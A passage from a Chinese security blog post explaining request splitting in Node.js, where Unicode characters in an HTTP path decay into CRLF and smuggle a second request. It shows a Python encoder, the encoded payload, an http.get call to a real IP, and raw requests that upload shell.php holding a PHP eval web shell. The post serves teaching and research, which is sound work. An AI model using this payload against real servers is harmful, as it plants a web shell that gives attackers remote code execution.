gzip, deflate</span></span><br><span class="line"><span class="string">Accept-Language: zh-CN,zh;q=0.9</span></span><br><span class="line"><span class="string">Cookie: PHPSESSID=nk67astv61hqanskkddslkgst4</span></span><br><span class="line"><span class="string">Connection: close</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">------WebKitFormBoundaryjDb9HMGTixAA7Am6</span></span><br><span class="line"><span class="string">Content-Disposition: form-data; name=&quot;MAX_FILE_SIZE&quot;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">100000</span></span><br><span class="line"><span class="string">------WebKitFormBoundaryjDb9HMGTixAA7Am6</span></span><br><span class="line"><span class="string">Content-Disposition: form-data; name=&quot;uploaded&quot;; filename=&quot;shell.php&quot;</span></span><br><span class="line"><span class="string">Content-Type: application/octet-stream</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&lt;?php eval($_POST[&quot;whoami&quot;]);?&gt;</span></span><br><span class="line"><span class="string">------WebKitFormBoundaryjDb9HMGTixAA7Am6</span></span><br><span class="line"><span class="string">Content-Disposition: form-data; name=&quot;Upload&quot;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Upload</span></span><br><span class="line"><span class="string">------WebKitFormBoundaryjDb9HMGTixAA7Am6--</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">GET / HTTP/1.1</span></span><br><span class="line"><span class="string">test:&#x27;&#x27;&#x27;</span>.replace(<span class="string">&quot;\n&quot;</span>,<span class="string">&quot;\r\n&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">payload_encode</span>(<span class="params">raw</span>):</span><br><span class="line">    ret = <span class="string">u&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> raw:</span><br><span class="line">        ret += <span class="built_in">chr</span>(<span class="number">0x0100</span>+<span class="built_in">ord</span>(i))</span><br><span class="line">    <span class="keyword">return</span> ret</span><br><span class="line"></span><br><span class="line">payload = payload_encode(payload)</span><br><span class="line"><span class="built_in">print</span>(payload)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 输出: ĠňŔŔŐįıĮıčĊčĊŐŏœŔĠįŵŰŬůšŤĮŰŨŰĠňŔŔŐįıĮıčĊňůųŴĺĠıĲķĮİĮİĮıčĊŃůŮŴťŮŴĭŌťŮŧŴŨĺĠĴĳķčĊŃůŮŴťŮŴĭŔŹŰťĺĠŭŵŬŴũŰšŲŴįŦůŲŭĭŤšŴšĻĠŢůŵŮŤšŲŹĽĭĭĭĭŗťŢŋũŴņůŲŭłůŵŮŤšŲŹŪńŢĹňōŇŔũŸŁŁķŁŭĶčĊŕųťŲĭŁŧťŮŴĺĠōůźũŬŬšįĵĮİĠĨŗũŮŤůŷųĠŎŔĠıİĮİĻĠŗũŮĶĴĻĠŸĶĴĩĠŁŰŰŬťŗťŢŋũŴįĵĳķĮĳĶĠĨŋňŔōŌĬĠŬũūťĠŇťţūůĩĠŃŨŲůŭťįĹİĮİĮĴĴĳİĮķĲĠœšŦšŲũįĵĳķĮĳĶčĊŁţţťŰŴĺĠŴťŸŴįŨŴŭŬĬšŰŰŬũţšŴũůŮįŸŨŴŭŬīŸŭŬĬšŰŰŬũţšŴũůŮįŸŭŬĻűĽİĮĹĬũŭšŧťįšŶũŦĬũŭšŧťįŷťŢŰĬũŭšŧťįšŰŮŧĬĪįĪĻűĽİĮĸĬšŰŰŬũţšŴũůŮįųũŧŮťŤĭťŸţŨšŮŧťĻŶĽŢĳĻűĽİĮĹčĊŁţţťŰŴĭŅŮţůŤũŮŧĺĠŧźũŰĬĠŤťŦŬšŴťčĊŁţţťŰŴĭŌšŮŧŵšŧťĺĠźŨĭŃŎĬźŨĻűĽİĮĹčĊŃůůūũťĺĠŐňŐœŅœœŉńĽŮūĶķšųŴŶĶıŨűšŮųūūŤŤųŬūŧųŴĴčĊŃůŮŮťţŴũůŮĺĠţŬůųťčĊčĊĭĭĭĭĭĭŗťŢŋũŴņůŲŭłůŵŮŤšŲŹŪńŢĹňōŇŔũŸŁŁķŁŭĶčĊŃůŮŴťŮŴĭńũųŰůųũŴũůŮĺĠŦůŲŭĭŤšŴšĻĠŮšŭťĽĢōŁŘşņŉŌŅşœŉŚŅĢčĊčĊıİİİİİčĊĭĭĭĭĭĭŗťŢŋũŴņůŲŭłůŵŮŤšŲŹŪńŢĹňōŇŔũŸŁŁķŁŭĶčĊŃůŮŴťŮŴĭńũųŰůųũŴũůŮĺĠŦůŲŭĭŤšŴšĻĠŮšŭťĽĢŵŰŬůšŤťŤĢĻĠŦũŬťŮšŭťĽĢųŨťŬŬĮŰŨŰĢčĊŃůŮŴťŮŴĭŔŹŰťĺĠšŰŰŬũţšŴũůŮįůţŴťŴĭųŴŲťšŭčĊčĊļĿŰŨŰĠťŶšŬĨĤşŐŏœŔśĢŷŨůšŭũĢŝĩĻĿľčĊĭĭĭĭĭĭŗťŢŋũŴņůŲŭłůŵŮŤšŲŹŪńŢĹňōŇŔũŸŁŁķŁŭĶčĊŃůŮŴťŮŴĭńũųŰůųũŴũůŮĺĠŦůŲŭĭŤšŴšĻĠŮšŭťĽĢŕŰŬůšŤĢčĊčĊŕŰŬůšŤčĊĭĭĭĭĭĭŗťŢŋũŴņůŲŭłůŵŮŤšŲŹŪńŢĹňōŇŔũŸŁŁķŁŭĶĭĭčĊčĊŇŅŔĠįĠňŔŔŐįıĮıčĊŴťųŴĺ</span></span><br></pre></td></tr></table></figure>

<p>构造请求：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; http.<span class="title function_ invoke__">get</span>(<span class="string">&#x27;http://47.101.57.72:4000/ĠňŔŔŐįıĮıčĊčĊŐŏœŔĠįŵŰŬůšŤĮŰŨŰĠňŔŔŐįıĮıčĊňůųŴĺĠıĲķĮİĮİĮıčĊŃůŮŴťŮŴĭŌťŮŧŴŨĺĠĴĳķčĊŃůŮŴťŮŴĭŔŹŰťĺĠŭŵŬŴũŰšŲŴįŦůŲŭĭŤšŴšĻĠŢůŵŮŤšŲŹĽĭĭĭĭŗťŢŋũŴņůŲŭłůŵŮŤšŲŹŪńŢĹňōŇŔũŸŁŁķŁŭĶčĊŕųťŲĭŁŧťŮŴĺĠōůźũŬŬšįĵĮİĠĨŗũŮŤůŷųĠŎŔĠıİĮİĻĠŗũŮĶĴĻĠŸĶĴĩĠŁŰŰŬťŗťŢŋũŴįĵĳķĮĳĶĠĨŋňŔōŌĬĠŬũūťĠŇťţūůĩĠŃŨŲůŭťįĹİĮİĮĴĴĳİĮķĲĠœšŦšŲũįĵĳķĮĳĶčĊŁţţťŰŴĺĠŴťŸŴįŨŴŭŬĬšŰŰŬũţšŴũůŮįŸŨŴŭŬīŸŭŬĬšŰŰŬũţšŴũůŮįŸŭŬĻűĽİĮĹĬũŭšŧťįšŶũŦĬũŭšŧťįŷťŢŰĬũŭšŧťįšŰŮŧĬĪįĪĻűĽİĮĸĬšŰŰŬũţšŴũůŮįųũŧŮťŤĭťŸţŨšŮŧťĻŶĽŢĳĻűĽİĮĹčĊŁţţťŰŴĭŅŮţůŤũŮŧĺĠŧźũŰĬĠŤťŦŬšŴťčĊŁţţťŰŴĭŌšŮŧŵšŧťĺĠźŨĭŃŎĬźŨĻűĽİĮĹčĊŃůůūũťĺĠŐňŐœŅœœŉńĽŮūĶķšųŴŶĶıŨűšŮųūūŤŤųŬūŧųŴĴčĊŃůŮŮťţŴũůŮĺĠţŬůųťčĊčĊĭĭĭĭĭĭŗťŢŋũŴņůŲŭłůŵŮŤšŲŹŪńŢĹňōŇŔũŸŁŁķŁŭĶčĊŃůŮŴťŮŴĭńũųŰůųũŴũůŮĺĠŦůŲŭĭŤšŴšĻĠŮšŭťĽĢōŁŘşņŉŌŅşœŉŚŅĢčĊčĊıİİİİİčĊĭĭĭĭĭĭŗťŢŋũŴņůŲŭłůŵŮŤšŲŹŪńŢĹňōŇŔũŸŁŁķŁŭĶčĊŃůŮŴťŮŴĭńũųŰůųũŴũůŮĺĠŦůŲŭĭŤšŴšĻĠŮšŭťĽĢŵŰŬůšŤťŤĢĻĠŦũŬťŮšŭťĽĢųŨťŬŬĮŰŨŰĢčĊŃůŮŴťŮŴĭŔŹŰťĺĠšŰŰŬũţšŴũůŮįůţŴťŴĭųŴŲťšŭčĊčĊļĿŰŨŰĠťŶšŬĨĤşŐŏœŔśĢŷŨůšŭũĢŝĩĻĿľčĊĭĭĭĭĭĭŗťŢŋũŴņůŲŭłůŵŮŤšŲŹŪńŢĹňōŇŔũŸŁŁķŁŭĶčĊŃůŮŴťŮŴĭńũųŰůųũŴũůŮĺĠŦůŲŭĭŤšŴšĻĠŮšŭťĽĢŕŰŬůšŤĢčĊčĊŕŰŬůšŤčĊĭĭĭĭĭĭŗťŢŋũŴņůŲŭłůŵŮŤšŲŹŪńŢĹňōŇŔũŸŁŁķŁŭĶĭĭčĊčĊŇŅŔĠįĠňŔŔŐįıĮıčĊŴťųŴĺ&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p><img src="https://p0.ssl.qhimg.com/t01aac9eb365660564a.png" alt="img"></p>
<p>如上图所示，成功构造出了一个文件上传的POST请求，像这样的POST请求可以被我们用于 SSRF。下面我们分析一下整个攻击的过程。</p>
<p>原始请求数据如下：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>47.101.57.72:4000</span><br></pre></td></tr></table></figure>

<p>当我们插入CRLF数据后，HTTP请求数据变成了：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"></span><br><span class="line"><span class="language-php">POST /upload.php HTTP/<span class="number">1.1</span></span></span><br><span class="line"><span class="language-php">Host: <span class="number">127.0</span>.<span class="number">0.1</span></span></span><br><span class="line"><span class="language-php">Content-Length: <span class="number">437</span></span></span><br><span class="line"><span class="language-php">Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjDb9HMGTixAA7Am6</span></span><br><span class="line"><span class="language-php">......</span></span><br><span class="line"><span class="language-php"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&quot;whoami&quot;</span>]);<span class="meta">?&gt;</span></span></span><br><span class="line"><span class="language-php">------WebKitFormBoundaryjDb9HMGTixAA7Am6</span></span><br><span class="line"><span class="language-php">Content-Disposition: form-data; name=<span class="string">&quot;Upload&quot;</span></span></span><br><span class="line"><span class="language-php"></span></span><br><span class="line"><span class="language-php">Upload</span></span><br><span class="line"><span class="language-php">------WebKitFormBoundaryjDb9HMGTixAA7Am6--</span></span><br><span class="line"><span class="language-php"></span></span><br><span class="line"><span class="language-php"> HTTP/<span class="number">1.1</span></span></span><br><span class="line"><span class="language-php">Host: <span class="number">47.101</span>.<span class="number">57.72</span>:<span class="number">4000</span></span></span><br></pre></td></tr></table></figure>

<p>上次请求包的Host字段和状态行中的 <code>HTTP/1.1</code> 就单独出来了，所以我们再构造一个请求把他闭合：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"></span><br><span class="line"><span class="language-php">POST /upload.php HTTP/<span class="number">1.1</span></span></span><br><span class="line"><span class="language-php">Host: <span class="number">127.0</span>.<span class="number">0.1</span></span></span><br><span class="line"><span class="language-php">Content-Length: <span class="number">437</span></span></span><br><span class="line"><span class="language-php">Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjDb9HMGTixAA7Am6</span></span><br><span class="line"><span class="language-php">......</span></span><br><span class="line"><span class="language-php"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&quot;whoami&quot;</span>]);<span class="meta">?&gt;</span></span></span><br><span class="line"><span class="language-php">------WebKitFormBoundaryjDb9HMGTixAA7Am6</span></span><br><span class="line"><span class="language-php">Content-Disposition: form-data; name=<span class="string">&quot;Upload&quot;</span></span></span><br><span class="line"><span class="language-php"></span></span><br><span class="line"><span class="language-php">Upload</span></span><br><span class="line"><span class="language-php">------WebKitFormBoundaryjDb9HMGTixAA7Am6--</span></span><br><span class="line"><span class="language-php"></span></span><br><span class="line"><span class="language-php">GET / HTTP/<span class="number">1.1</span></span></span><br><span class="line"><span class="language-php">test: HTTP/<span class="number">1.1</span></span></span><br><span class="line"><span class="language-php">Host: <span class="number">47.101</span>.<span class="number">57.72</span>:<span class="number">4000</span></span></span><br></pre></td></tr></table></figure>


    </div>

    
    
    
      
  <div class="popular-posts-header">相关文章</div>
  <ul class="popular-posts">
    <li class="popular-posts-item">
      <div class="popular-posts-title"><a href="\2023\09\01\nodejs(原型链污染)深入\" rel="bookmark">nodejs(原型链污染)深入</a></div>
    </li>
    <li class="popular-posts-item">
      <div class="popular-posts-title"><a href="\2023\08\25\nodejs(原型链污染)浅入\" rel="bookmark">nodejs(原型链污染)浅入</a></div>
    </li>
  </ul>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/js/" rel="tag"># js</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/03/25/2023Cyber-Apocalypse/" rel="prev" title="Cyber Apocalypse 2023 wp">
      <i class="fa fa-chevron-left"></i> Cyber Apocalypse 2023 wp
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/04/07/Interesting-Game-wp/" rel="next" title="Interesting Game wp">
      Interesting Game wp <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#res-render"><span class="nav-number">1.</span> <span class="nav-text">res.render()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%87%8D%E5%AE%9A%E5%90%91%E6%A6%82%E5%BF%B5"><span class="nav-number">2.</span> <span class="nav-text">重定向概念</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#res-location"><span class="nav-number">2.1.</span> <span class="nav-text">res.location()</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#res-redirect"><span class="nav-number">2.2.</span> <span class="nav-text">res.redirect</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#delimiter"><span class="nav-number">3.</span> <span class="nav-text">delimiter</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Custom-delimiters"><span class="nav-number">3.1.</span> <span class="nav-text">Custom delimiters</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#NodeJS-%E4%B8%AD%E7%9A%84-CRLF-SSRF-Injection"><span class="nav-number">4.</span> <span class="nav-text">NodeJS 中的 CRLF&#x2F;SSRF Injection</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#HTTP-%E8%AF%B7%E6%B1%82%E8%B7%AF%E5%BE%84%E4%B8%AD%E7%9A%84-Unicode-%E5%AD%97%E7%AC%A6%E6%8D%9F%E5%9D%8F"><span class="nav-number">4.1.</span> <span class="nav-text">HTTP 请求路径中的 Unicode 字符损坏</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Unicode-%E5%AD%97%E7%AC%A6%E6%8D%9F%E5%9D%8F%E9%80%A0%E6%88%90%E7%9A%84-HTTP-%E6%8B%86%E5%88%86%E6%94%BB%E5%87%BB"><span class="nav-number">4.2.</span> <span class="nav-text">Unicode 字符损坏造成的 HTTP 拆分攻击</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9C%A8-HTTP-%E7%8A%B6%E6%80%81%E8%A1%8C%E6%B3%A8%E5%85%A5%E6%81%B6%E6%84%8F%E9%A6%96%E9%83%A8%E5%AD%97%E6%AE%B5"><span class="nav-number">4.3.</span> <span class="nav-text">在 HTTP 状态行注入恶意首部字段</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9C%A8-HTTP-%E7%8A%B6%E6%80%81%E8%A1%8C%E6%B3%A8%E5%85%A5%E5%AE%8C%E6%95%B4-HTTP-%E8%AF%B7%E6%B1%82"><span class="nav-number">4.4.</span> <span class="nav-text">在 HTTP 状态行注入完整 HTTP 请求</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Ttoc"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">Ttoc</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">49</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">15</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/try-to-change" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;try-to-change" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:wejoke3@gmail.com" title="E-Mail → mailto:wejoke3@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2022 – 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ttoc</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<script async>window.onload=function(){var a=document.createElement('script'),b=document.getElementsByTagName('script')[0];a.type='text/javascript',a.async=!0,a.src='/sw-register.js?v='+Date.now(),b.parentNode.insertBefore(a,b)};</script></body></html>